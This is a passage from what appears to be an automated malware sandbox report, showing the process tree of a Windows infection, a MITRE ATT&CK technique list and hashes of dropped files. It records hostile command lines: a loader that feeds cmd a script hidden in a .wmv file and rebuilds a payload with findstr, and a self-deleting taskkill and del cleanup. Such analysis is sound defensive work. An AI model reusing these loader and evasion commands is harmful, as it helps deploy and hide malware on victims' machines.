                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                                                                                                    c.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4888
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5428
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:5372
                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:5152
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                  Puramente.exe.com m
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:6112
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:5632
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                      ping RJMQBVDN -n 30
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                      PID:4624
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                                                                                                l.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4780
                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4936
                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6128
                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5780
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4520
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4236
                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6088
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4508
                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                            PID:2240
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2140
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4704
                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:5796
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\B833.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\B833.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5276
                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                    cmd /c start c.exe & start l.exe
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5888
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c.exe
                                                                                                                                                                                                                                        c.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3656
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:4332
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:5860
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                    findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:4844
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Puramente.exe.com
                                                                                                                                                                                                                                                      Puramente.exe.com m
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:2924
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        ping RJMQBVDN -n 30
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:668
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l.exe
                                                                                                                                                                                                                                                  l.exe
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3196
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D409.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D409.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:1536
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9D26.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\9D26.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1516
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 9D26.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9D26.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:1848
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          taskkill /im 9D26.exe /f
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:4384
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                          PID:5716
                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:3028
                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5368

                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                        6
                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                        6
                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                        Security Software Discovery

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1063

                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1018

                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          afd33b39cc87ff4d2e7047e199b911f0

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          71adba01096df16f501b202b07d24d5c3fee37df

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          22221d5e43e091a1c03113d1bb37d8dd95dcf07d8756c87d2df6c0d1ab944845

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          9802fdf92b9735740bf23b943fd9fa15c374d09a2a13c90823a96654cc0a3fd157148b9600153d66721ee57023227339c30bab4cc7780737cd8a0a9844be3671

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          afd33b39cc87ff4d2e7047e199b911f0

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          71adba01096df16f501b202b07d24d5c3fee37df

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          22221d5e43e091a1c03113d1bb37d8dd95dcf07d8756c87d2df6c0d1ab944845

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          9802fdf92b9735740bf23b943fd9fa15c374d09a2a13c90823a96654cc0a3fd157148b9600153d66721ee57023227339c30bab4cc7780737cd8a0a9844be3671

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          2b9057ea33dadb622ed43599d57bc266

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          dce14b3cb7dd2652537e9d99e36f1e7a2d7e0b1f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          1390afb2e107ea17da6ea337514a23f7f7ea0dc4595280b05f32c53482b4c428

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          27b1015582ae266a13cef5e752ce73aee20e63a1e3a83be5edab79d7955e89256be52e4f3881496293b268579cbc7f16a32b217f9e26b9dfc6602e41f80b3384

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          2b1ef20f21a2d7787695e2c47744f426

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          407cf09372979d396d9ff7ed80c48c915e17e675

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          70754b3a52cb6f3b68f664be0f8da0ca7f7edcb1ead7c5ca929b8d39e765657c

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          e69c2dacc9a8233471360ccb416fa071c8a9b236625fa1978a53d3c28031e1d5df4102f13f4ff75b9be42eaf1a43b0de62abf7cd57f3e74a25059b3105827ac8

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\libcurl.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\libcurlpp.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\libstdc++-6.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\libwinpthread-1.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\setup_install.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\setup_install.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_1.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_1.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_1.txt
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_2.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_2.txt
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_3.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_3.txt
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_4.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_4.txt
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_5.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                          SHA512

